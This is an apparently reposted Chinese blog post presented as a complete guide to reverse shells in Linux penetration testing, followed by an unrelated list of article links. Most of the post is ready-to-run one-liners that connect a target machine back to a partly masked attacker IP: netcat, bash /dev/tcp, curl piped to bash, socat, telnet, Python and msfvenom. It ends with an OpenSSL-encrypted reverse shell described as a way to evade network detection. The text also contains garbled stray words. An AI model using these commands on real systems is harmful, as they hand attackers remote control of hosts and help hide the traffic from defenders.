博客
关于我
反弹Shell,看这一篇就够了
阅读量:706 次
发布时间:2019-03-21

本文共 1835 字,大约阅读时间需要 6 分钟。

渗透测试中,Linux系统的反弹shell操作无疑是一个经典且重要的情景。攻击者通过在目标机上建立一个向攻击机转发的反弹通道,能够模拟一个虚拟终端,从而获得对目标系统的远程控制权限。

反弹shell的核心作用在于克服传统正向连接的局限性。例如,当目标机防火墙严格控制出口访问,端口资源受限,或主机位于动态IP环境中时,正向连接往往难以实现。而反弹shell则通过将攻击机指定为服务端,依赖目标机的主动连接,成为突破这些限制的有效武器。

反弹shell的实现方法

反弹shell的具体实现多种多样,常见方式包括:

1. 利用Netcat反弹shell

Netcat(nc)是一款强大的网络测试工具,广泛用于反弹shell。尽管部分发行版限制了其encia unfortunately(-e)参数,攻击者仍可通过手动安装特定版本来利用Netcat反弹shell。

命令示例:

nc -lvvp 2333

攻击机开启监听,目标机执行:

nc 47.xxx.xxx.72 2333 -e /bin/bash

2. Bash反弹shell

Bash可通过标准输入结合重定向实现反弹shell,命令如下:

bash -i > /dev/tcp/47.xxx.xxx.72/2333 0>&1

3. Curl配合Bash反弹shell

借助curl命令,可将反弹shell命令触发为目标机执行:

curl 47.xxx.xxx.72 | bash

4. Socat反弹shell

Socat是一款功能强大的网络工具,用于创建和管理网络连接,反弹shell的实现较为简便。

命令示例:

socat TCP-LISTEN:2333 -

攻击机监听,目标机执行:

socat tcp-connect:47.xxx.xxx.72:2333 exec:/bin/bash

5. Telnet反弹shell

在支持Telnet的目标机上,可通过Telnet客户端实现反弹shell。

命令示例(目标机执行):

telnet 47.xxx.xxx.72 2333 | /bin/bash

6. Python、PHP、Perl脚本反弹shell

针对目标机具备相应脚本环境,可借助Python、PHP、Perl等语言实现反弹shell。以下是Python示例:

python -c "import socket,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('47.xxx.xxx.72', 2333)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); import sys; sys.stdin = s.makefile(1); sys.stdout = s.makefile(1); import pty; pty.spawn(['/bin/bash'])"

7. menggunakan Metasploit

Metasploit框架提供了生成一句话反弹shell的强大功能。如需生成特定语言反弹shell可执行:

msfvenom -l | grep cmd/unix/reverse

目标机执行生成的payload即可实现反弹shell。

OpenSSL反弹加密shell

传统反弹shell的通信流量为明文,易被网络防护设备发现。使用OpenSSL,攻击者可在反弹过程中加入加密层,克服这一限制。

配置步骤:

  • 在攻击机生成自签名证书:
  • openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
    1. 在攻击机监听:
    2. openssl s_server -quiet -key key.pem -cert cert.pem -port 2333
      1. 在目标机执行反弹shell:
      2. mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.xxx.xxx.72:2333 > /tmp/s; rm /tmp/s

        通过以上方法,攻击者可根据目标环境选择最适合的手段,成功实现反弹shell,获取目标系统的控制权限。

    转载地址:http://hutez.baihongyu.com/

    你可能感兴趣的文章
    Spring security之管理session
    查看>>
    paramiko模块
    查看>>
    param[:]=param-lr*param.grad/batch_size的理解
    查看>>
    spring mvc excludePathPatterns失效 如何解决spring拦截器失效 excludePathPatterns忽略失效 拦截器失效 spring免验证拦截器不起作用
    查看>>
    Spring Cloud 之注册中心 EurekaServerAutoConfiguration源码分析
    查看>>
    Parrot OS 6.2 重磅发布!推出全新 Docker 容器启动器
    查看>>
    Parrot OS 6.3 发布!全面提升安全性,新增先进工具,带来更高性能
    查看>>
    ParseChat应用源码ios版
    查看>>
    Part 2异常和错误
    查看>>
    Pascal Script
    查看>>
    Spring Boot集成Redis实现keyspace监听 | Spring Cloud 34
    查看>>
    Spring Boot中的自定义事件详解与实战
    查看>>
    Passport 密码模式
    查看>>
    Spring Boot(七十六):集成Redisson实现布隆过滤器(Bloom Filter)
    查看>>
    passport 简易搭配
    查看>>
    passwd命令限制用户密码到期时间
    查看>>
    Spring Boot 动态加载jar包,动态配置太强了!
    查看>>
    Spring @Async执行异步方法的简单使用
    查看>>
    PAT (Basic Level) Practice 乙级1021-1030
    查看>>
    PAT (Basic Level) Practice 乙级1031-1040
    查看>>